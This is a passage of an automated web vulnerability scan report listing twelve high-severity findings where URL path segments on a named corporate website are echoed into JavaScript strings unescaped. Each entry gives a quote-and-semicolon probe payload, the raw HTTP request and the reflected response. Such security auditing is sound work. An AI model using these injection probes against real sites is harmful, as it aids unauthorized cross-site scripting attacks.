Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/field6450f"%3bcf06a9b0721/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/field6450f";cf06a9b0721/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.955. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a230b"%3b3cf92047524 was submitted in the REST URL parameter 1. This input was echoed as a230b";3cf92047524 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsa230b"%3b3cf92047524/bysolutions/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:55 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsa230b";3cf92047524/bysolutions/infrastructure/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.956. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bc52'%3beee7272bb9e was submitted in the REST URL parameter 1. This input was echoed as 8bc52';eee7272bb9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions8bc52'%3beee7272bb9e/bysolutions/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions8bc52';eee7272bb9e/bysolutions/infrastructure/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.957. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 848ca'%3bd30155e8c51 was submitted in the REST URL parameter 2. This input was echoed as 848ca';d30155e8c51 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions848ca'%3bd30155e8c51/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:33 GMT
Content-Type: text/html
Content-Length: 41886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions848ca';d30155e8c51/infrastructure/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.958. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a2cd"%3b5136ad7efc was submitted in the REST URL parameter 2. This input was echoed as 5a2cd";5136ad7efc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions5a2cd"%3b5136ad7efc/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:09 GMT
Content-Type: text/html
Content-Length: 41884
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions5a2cd";5136ad7efc/infrastructure/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.959. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8e3'%3ba22bf9760a3 was submitted in the REST URL parameter 3. This input was echoed as 8a8e3';a22bf9760a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/infrastructure8a8e3'%3ba22bf9760a3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43110
Date: Wed, 17 Nov 2010 00:36:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/infrastructure8a8e3';a22bf9760a3/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.960. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 572bd"%3bc9a4c109a19 was submitted in the REST URL parameter 3. This input was echoed as 572bd";c9a4c109a19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/infrastructure572bd"%3bc9a4c109a19/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:35:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43108
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/infrastructure572bd";c9a4c109a19/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.961. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b0e"%3b6e1f2fe6487 was submitted in the REST URL parameter 1. This input was echoed as 53b0e";6e1f2fe6487 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions53b0e"%3b6e1f2fe6487/bysolutions/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions53b0e";6e1f2fe6487/bysolutions/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.962. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0d63'%3b7600eab8397 was submitted in the REST URL parameter 1. This input was echoed as e0d63';7600eab8397 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse0d63'%3b7600eab8397/bysolutions/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutionse0d63';7600eab8397/bysolutions/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.963. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1150"%3b236bb1aebf6 was submitted in the REST URL parameter 2. This input was echoed as b1150";236bb1aebf6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsb1150"%3b236bb1aebf6/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsb1150";236bb1aebf6/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.964. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbfe7'%3b2c0a52b20df was submitted in the REST URL parameter 2. This input was echoed as bbfe7';2c0a52b20df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsbbfe7'%3b2c0a52b20df/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsbbfe7';2c0a52b20df/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.965. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbc64"%3b809b54e9aac was submitted in the REST URL parameter 3. This input was echoed as bbc64";809b54e9aac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/managedbbc64"%3b809b54e9aac/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:08 GMT
Content-Type: text/html
Content-Length: 43096
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/managedbbc64";809b54e9aac/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.966. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11dce'%3ba2da5b1f7f3 was submitted in the REST URL parameter 3. This input was echoed as 11dce';a2da5b1f7f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/managed11dce'%3ba2da5b1f7f3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:30 GMT
Content-Type: text/html
Content-Length: 43096
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
